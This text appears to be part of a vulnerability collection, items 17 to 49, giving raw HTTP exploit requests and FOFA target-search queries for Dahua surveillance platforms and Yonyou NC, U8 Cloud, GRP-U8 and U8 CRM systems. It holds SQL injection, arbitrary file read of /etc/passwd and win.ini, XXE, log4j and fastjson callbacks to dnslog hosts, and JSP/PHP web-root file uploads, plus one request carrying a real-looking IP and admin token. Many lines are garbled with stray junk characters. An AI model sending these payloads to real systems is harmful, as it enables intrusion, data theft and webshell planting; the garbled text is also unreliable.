Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. 大华 (Dahua) DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. 大华 DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. 大华 DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. 大华 ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. 大华 ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
This is a fastjson probe: the body is intentionally malformed JSON, and success is confirmed out of band by a DNS query for the dnslog domain (replace it with one you control).
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
}""
}

22. 大华 ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
Replace dnslog with a DNS-logging domain you control; a lookup for it confirms the JNDI string was evaluated.
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. 大华 ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
Same endpoint and payload shape as item 21, with DNSLOG standing for a DNS-logging domain you control.
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
       {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. 用友 (UFIDA) NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
The fname field decides where the file is written; here it places a JSP under the nc_web web root, and fetching that .jsp and seeing the marker string confirms the upload.
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

% p' F# V+ O! D4 E- A  W! f25. 用友NC registerServlet JNDI 远程代码执行
' V+ J0 u& R, O3 B( ?FOFA:app="用友-UFIDA-NC"
! g9 v9 Y2 {+ a$ Q6 l* r; _# D2 f5 |POST /portal/registerServlet HTTP/1.1
- ^6 h2 o3 W: N' U$ q. C  EHost: your-ip
3 D2 b7 q9 h$ X* {! L5 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
7 o: U$ {* M3 q$ S& |. hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9* X3 Z- R/ E9 @! m7 V5 S
Accept-Encoding: gzip, deflate
: L4 ~0 u( T! W- C- _0 R0 hAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.64 n# E/ I1 N  o8 V$ Z; Y
Content-Type: application/x-www-form-urlencoded$ m% i7 n6 ?3 f0 _% {

* b1 z2 G( q( a* ^- `  I# ytype=1&dsname=ldap://dnslog' m  Z$ Y+ W0 a6 N# F8 U
6 ^; h4 T7 X4 a# e4 ^8 h3 g
4 A) a* b3 K) L5 [: G9 n- R1 Y

1 P$ U4 c7 r- w8 X6 k26. 用友NC linkVoucher SQL注入% o1 j# o, z1 L8 I5 l7 X
FOFA:app="用友-UFIDA-NC"; `- c6 y+ I! s% r3 S
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
: M/ M* q( h$ S1 GHost: your-ip
0 ^3 r2 Y: j6 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36$ c( q$ ?* B6 e# l' |
Content-Type: application/x-www-form-urlencoded  n; L# _, P% a! c' G& G
Accept-Encoding: gzip, deflate
: |2 {7 c0 S4 R+ M$ U/ W8 ~6 Y0 JAccept: */*
) c5 U# z( p9 z( U% eConnection: keep-alive# G* x+ O! i- j

$ I1 ~% V$ J1 y* Q8 P7 H# w; m& u: P" R7 W
27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

$ T+ E1 g( g. k& i# K) Q28. 用友NC grouptemplet 任意文件上传
! a. j8 r  r6 ~& f$ S! CFOFA:icon_hash="1085941792"1 z! n( Q+ C6 p7 m0 |
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1( i; r' ]& q! W  W: W& ]: R
Host: x.x.x.x
3 Y+ M& C/ |2 p. [7 q* a: ~! k8 hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
! t1 f' d# t9 q2 `, SConnection: close
, A: C7 E8 e' t7 B# K' s- {Content-Length: 268
/ I, A( o' }( D6 Y; iContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk- Z6 r+ a- Y9 _  g( ~
Accept-Encoding: gzip1 x: F( @" c& {% N# A; r0 O9 `" [
0 @; L2 J' w4 H4 S/ h
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk5 h) ]$ ?! ]4 v* O, N! v: ]
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"6 c0 p* y3 _/ \) i! _) Q+ o
Content-Type: application/octet-stream5 O, Q  L0 v, y6 n, C7 _

6 u# }. Q* c; T. |4 r4 z<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>+ ]* i2 @4 ?6 M: ^$ h, M5 `7 S+ z* P
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--6 y: @; C+ R1 T9 o4 w+ Q

2 Z  P7 t$ X* k: r2 @9 A. @" J* h9 d& {5 D, W3 H& G
/uapim/static/pages/nc/head.jsp
7 O$ Z  V$ p+ [8 |, k7 t- d" ^- X0 v5 H, ^: b. f* n' L
29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

2 z# h) K7 N( y* W) ^: {9 O30. 用友NC importPml SQL注入5 q# n% l( o; w
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"3 l8 I4 Z6 ?/ }' T6 B/ _# L
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1+ c  {6 b3 @$ m: V( c  H  c' i+ }
Host: your-ip
: o/ F0 P1 P: r5 g# N# d" [Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
" u3 X+ g$ z) ], H6 j+ `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, p# ]0 {% l& P3 j) v  J9 Q+ y
Connection: close
5 G( M' v) F- M$ I. j: u! T  j+ T( B; S# G
------WebKitFormBoundaryH970hbttBhoCyj9V
7 B  k/ z( N/ G9 T( W  BContent-Disposition: form-data; name="Filedata"; filename="1.jpg"" q7 r% C3 k. L; B( C* g8 b2 c
Content-Type: image/jpeg; E6 Y& l% E9 M2 f! g. r2 f
------WebKitFormBoundaryH970hbttBhoCyj9V--
5 m9 N' X( Y: n$ A, S2 k. D
. z' h2 d' N0 K4 s! j$ w6 P: B
31. Yonyou NC runStateServlet SQL injection
version: <=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
version: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

2 i- ?" }! ]5 l' E- W5 H0 ^9 \& x' |33. 用友NC downTax/download SQL注入2 I' b; P9 n  l7 O
version:NC6.5FOFA:app="用友-UFIDA-NC"
9 q# c8 s8 K1 z# J. x$ g5 K  n0 w" bGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
" H- V3 [. Z' }4 V3 x; rHost: your-ip
' T# X! S% E7 G$ Q, C- e8 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 Q& ?4 h. W) A# C, P; G  q) |Content-Type: application/x-www-form-urlencoded% ?4 V) m" M$ K+ t
Accept-Encoding: gzip, deflate' f$ R" n, n2 |# _9 M
Accept: */*- O6 R( w9 q3 `8 k
Connection: keep-alive
8 ]4 c4 L$ k% a3 i6 q$ K! y$ n' C; a

; O( ~# x0 Z* o34. 用友NC warningDetailInfo接口SQL注入' i; |) w9 t  S9 Y$ }
FOFA:app="用友-UFIDA-NC"- \$ V3 U; l  x# E. [! S  G$ v
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1- I& E: {5 h9 R# E
Host: your-ip
1 k" N, V; g; \/ K5 O% q7 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 I/ ?) C) c0 H+ X8 I3 o: [
Content-Type: application/x-www-form-urlencoded4 k2 Z/ ^  Y  C# o
Accept-Encoding: gzip, deflate7 @; Y" Z7 D$ h
Accept: */*
! o+ v4 r9 Y) o% f8 iConnection: keep-alive# E- S0 E' l6 |  o4 I% ^; }

* f; d4 z; r' ^
* z( D! Z6 S8 U  m. y* M35. 用友NC-Cloud importhttpscer任意文件上传
9 \% `8 z! M: {9 z' T0 gFOFA:app="用友-NC-Cloud"/ H& A( m% |8 k* w4 h! k+ C
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
( f6 s7 w% F" o4 y, THost: 203.25.218.166:88887 D" [' g0 X/ S- d; Q
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
" N- X9 e1 s4 R( jAccept-Encoding: gzip, deflate- L+ o; o6 w1 h/ t9 O
Accept: */*; l' w# l2 q8 l+ m; u5 s, r
Connection: close+ o' z8 G* m1 J# @) _
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
: y( q! @1 k0 ]$ g3 j% f2 jContent-Length: 190
$ u% q& ^9 ^% B- Y9 B4 r* eContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df00 G9 @  K+ l% U7 H
3 H# Q5 z, ]0 M! O) C9 \
--fd28cb44e829ed1c197ec3bc71748df0) L& y) r& r* U2 p* L1 {
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
2 P. D4 F2 s! k: z
( M# M0 T$ G  N  e$ m<%out.println(1111*1111);%>
0 _  a& C+ G' s--fd28cb44e829ed1c197ec3bc71748df0--/ Y. T# c! N9 B1 [! D
$ C/ t: G5 P( C' _) q/ K
* o$ l% M1 D! V' H. p6 I) R
36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

# V9 |0 J+ N; o6 h38. 用友U8 Cloud smartweb2.RPC.d XXE+ U, k, p, v( l  B; \. Z
FOFA:app="用友-U8-Cloud"
6 _% y# ^6 m3 mPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
, h2 w' D" w4 S/ C, ]Host: 192.168.40.131:8088
0 O$ d# h# T/ A. K' G, W/ AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
9 Y  h. H/ K' V3 f* aContent-Length: 2602 m& o& \0 c" D% l/ ~( l4 ]. u; f0 ]9 q/ y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3% V/ A0 t/ t9 ^$ s5 w) q
Accept-Encoding: gzip, deflate( j8 f5 `! U% ]& \  y. P% e# Y" S" H
Accept-Language: zh-CN,zh;q=0.92 N: u+ e# A0 }) b
Connection: close
2 N# A: F( D: F8 cContent-Type: application/x-www-form-urlencoded3 D6 k" x/ b8 L4 V4 O/ h7 }/ R# d- x

) c3 C8 N2 t  h9 p! @2 J__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
  g7 W8 V  {% P- s2 o" D" z9 X3 `) s9 h0 S! ^

* \" a# x$ j) i: Y8 f39. 用友U8 Cloud RegisterServlet SQL注入
$ S' }4 y0 k3 }* p+ J$ g5 d; lFOFA:title="u8c"
/ Z( \$ i) A' V+ OPOST /servlet/RegisterServlet HTTP/1.1
4 n9 r6 M! p2 e7 {# `Host: 192.168.86.128:8089( b- v* I6 F0 d2 A+ |- @% m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
8 u( h$ s! Z0 W% a' jConnection: close
( J) P0 N* u' C) o7 b4 TContent-Length: 858 C, t9 u  `( U0 V( e
Accept: */*9 j4 x4 r5 r' j
Accept-Language: en% V( f7 z8 j5 G2 w/ a
Content-Type: application/x-www-form-urlencoded! L8 q* _; u0 d( Q
X-Forwarded-For: 127.0.0.1
, }6 L3 {7 I; A, `7 {, R- MAccept-Encoding: gzip. O5 I( v$ t* N' \) D

( b0 }* L" g0 U3 P/ f5 musercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
9 f/ y# Y7 O5 T1 b
& p8 K0 ^( [" Y4 l) ]) s5 ^9 J0 I5 ~9 ~0 b1 B5 o3 t+ n& ?
40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

( F- i0 o/ x) W8 M% E' w* X42. 用友GRP-U8 SmartUpload01 文件上传
8 n: @8 _0 f) \* d0 MFOFA:app="用友-GRP-U8"
6 V0 q  t5 \! }  I- p: `POST /u8qx/SmartUpload01.jsp HTTP/1.1! X  N2 \0 v9 Q0 t
Host: x.x.x.x
4 g- W+ R# B: k. U; fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt1 ]% j- ?5 U# {; R+ b& m+ |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36: j1 S3 `6 k2 u  p' C
- V4 j/ C) j/ {- a) p
PAYLOAD8 Q4 B5 t! P5 X* G) [& F# l6 I, x
4 p3 j* {( D$ Y6 O7 O* |! B

/ l& ~* Z; I8 ]. \* Qhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
& k3 R* c& e) m8 J. L' r$ m5 r0 a9 j( R$ B( `7 U3 E- T) z8 c
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

" j" d7 o3 j) [1 R5 L; `44. 用友GRP-U8 bx_dj_check.jsp SQL注入- H0 s/ u% D* n+ _
FOFA:app="用友-GRP-U8"
. K0 L6 V1 W( _# bGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.14 t* f3 ]9 @( _/ Y* B+ E' `# i% o8 S
Host: your-ip7 X2 s6 K0 v3 Y" K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
/ {4 U" B, v, K5 m, @  W$ Y: fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 Z  n3 f7 \  U) T
Accept-Encoding: gzip, deflate9 ^1 ~# S$ x) c/ k
Accept-Language: zh-CN,zh;q=0.9; e4 r. [% W, y2 r) ~4 g, @
Connection: close
* \3 g3 z# ?1 E- O* [) ?  @8 U; e9 N  \( N" N
4 P( ?( m1 {( g- S
45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

( b* Z% S3 ?: v1 L3 p, z46. 用友GRP-U8 sqcxIndex.jsp SQL注入( e/ X9 j  ~' L8 ]' y) h
FOFA:app="用友-GRP-U8"
1 O* ]1 n! q& Y9 @0 jGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.19 [- ^- S" P' i  \, |
Host: your-ip, b* c+ K* ~5 I$ o+ b% |! {: K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
$ b4 f' |- h5 X: s# U1 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 H$ V7 z; S9 ?! WAccept-Encoding: gzip, deflate
1 d: L5 B% @7 c  I1 x  DAccept-Language: zh-CN,zh;q=0.9
8 `' D, e5 w5 iConnection: close- e- z7 G4 U, b& }5 ?
; D  J/ a2 B5 b
& R; r- a. F+ o, ?$ m9 o( `6 S
47. Yonyou GRP A++Cloud Government Finance Cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

49. Yonyou U8 CRM uploadfile.php endpoint arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
